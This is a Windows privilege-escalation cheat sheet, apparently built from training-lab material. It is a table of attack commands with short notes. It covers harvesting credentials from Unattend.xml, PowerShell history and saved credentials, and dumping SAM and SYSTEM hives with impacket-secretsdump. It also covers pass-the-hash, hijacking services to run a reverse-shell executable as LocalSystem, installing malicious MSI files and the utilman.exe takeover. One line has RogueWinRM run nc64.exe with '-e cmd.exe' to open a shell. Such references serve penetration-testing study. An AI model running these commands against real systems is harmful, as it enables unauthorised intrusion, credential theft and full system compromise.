Windows PrivEsc CheatSheet

Home | CheatSheets | Theory | About | Back

Windows Privilege Escalation:

| Command/File | Notes | |—————————————————————————————————————————————————————————— |———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————- | | C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml | Check these files for secrets such as passwords of domain users, including administrators.
Installations deployed using Windows Deployment Services might contain contain these files
and have credentials hardcoded into them. | | type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt | Get PowerShell history, similar to .bash_history in Linux, might find credentials
in commands entered into PowerShell cmdlets. | | cmdkey /list | Check for saved credentials. | | runas /savecred /user:admin cmd.exe | Run cmd.exe as a user using saved credentials identified from cmdkey /list command | | type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString | Check for database passwords stored in the connection string in web.config files, note the web.config
file might be in a different location to the one specified here. | | reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f “Proxy” /s | Check for stored proxy credentials. | | schtasks /query /tn vulntask /fo list /v | List scheduled tasks on the host, focus on the “Task To Run” option of the scheduled task as well as the author. | | icacls | Check the permissions associated with a file, useful for scheduled task PrivEsc. | | schtasks /run /tn | Run a scheduled task manually, note you must have permissions to do this | | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer | Check if we can install windows installer files (.msi files) with system privileges, both these values
must be set for this to work 0x1. | | msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi | Execute a .msi payload on the host, exploiting the always install elevated feature. | | sc.exe qc | Query information about the configuration of a service, e.g BINARY_PATH_NAME, START_TYPE. | | reg query HKLM\SYSTEM\CurrentControlSet\Services\ | Query information from the registry about a specific service. If a DACL has been configured for the service,
it will be stored in a subkey called Security. | | icacls /grant Everyone:F
sc.exe stop ; sc.exe start | Grant full control over a service executable, and restart a service that we have modified the executable for,
note if we're using PowerShell we must use 'sc.exe' not just 'sc' since 'sc' is an alias for Set-Content. | | "C:\Program Files\RealVNC\VNC Server\vncserver.exe" | Example of an unquoted service path, we can identify unquoted service paths using sc.exe, | | accesschk64.exe /accepteula -qlc | Use accesschk.exe part of SysInternals to inspect the DACL of a service, should the service DACL (not the service's executable DACL)
allow you to modify the configuration of a service, you will be able to reconfigure the service. This will allow you to point to any
executable you need and run it with any account you prefer, including SYSTEM itself. | | sc.exe config binPath= "C:\Users\thm-unpriv\revshell.exe" obj= LocalSystem | Reconfigure a service to use our malicious executable, we verify that we can reconfigure a service from the DACL using accesschk,
we specify which account to run the service in this case LocalSystem since it has the most privileges. | | whoami /priv | Display privileges associated with the current account. https://learn.microsoft.com/en-us/windows/win32/secauthz/privilege-constants | | reg save hklm\system C:\Users\\system.hive
reg save hklm\sam C:\Users\\sam.hive | If our user has the SeBackup / SeRestore set, we can read and write to any file in the system, ignoring any DACL in place | | impacket-smbserver -smb2support -username -password public | Create an SMB server using impacket on our attacking machine, we can copy files from the target machine to our local machine using
the "copy" command. Note that we must make a directory called first and set its permissions
appropriately e.g chmod 777 | | impacket-secretsdump -sam sam.hive -system system.hive LOCAL | Use impacket to dump password hashes from the exported SAM and SYSTEM files. | | impacket-psexec -hashes @ | Use impacket to perform a pass-the-hash attack using extracted password hashes. | | takeown /f
icacls /grant :F
copy cmd.exe | Take ownership over a file, note that this is only possible if the SeTakeOwnershipPrivileges in available for the compromised
user account. Run "whoami /priv" to verify this. Being the owner of the file doesn't grant us full control over it, but being
the owner you can assign yourself any privileges you need. To give your user full permissions over utilman.exe you can use
the icacls command. Works well with executables like utilman.exe which run with SYSTEM privileges. | | RogueWinRM.exe -p "nc64.exe" -a "-e cmd.exe " | Run the RogueWinRM exploit using a compromised Service Account with SeImpersonatePrivilege / SeAssignPrimaryToken privileges.
The RogueWinRM exploit is possible because whenever a user (including unprivileged users) starts the BITS service in Windows,
it automatically creates a connection to port 5985 using SYSTEM privileges. Port 5985 is typically used for the WinRM service,
which is simply a port that exposes a Powershell console to be used remotely through the network.

If, for some reason, the WinRM service isn't running on the victim server, an attacker can start a fake WinRM service on port
5985/tcp and catch the authentication attempt made by the BITS service when starting. If the attacker has SeImpersonate privileges,
they can execute any command on behalf of the connecting user. | | wmic product get name,version,vendor | You can use the wmic tool to list software installed on the target system and its versions. The command below will dump information
it can gather on installed software. | | https://github.com/itm4n/PrivescCheck
https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
https://github.com/bitsadmin/wesng | Some useful tools for automating privilege escalation, note remember to run Set-ExecutionPolicy Bypass -Scope process -Force before
attempting to run PowerShell scripts in the event that the Execution Policy is restricted. |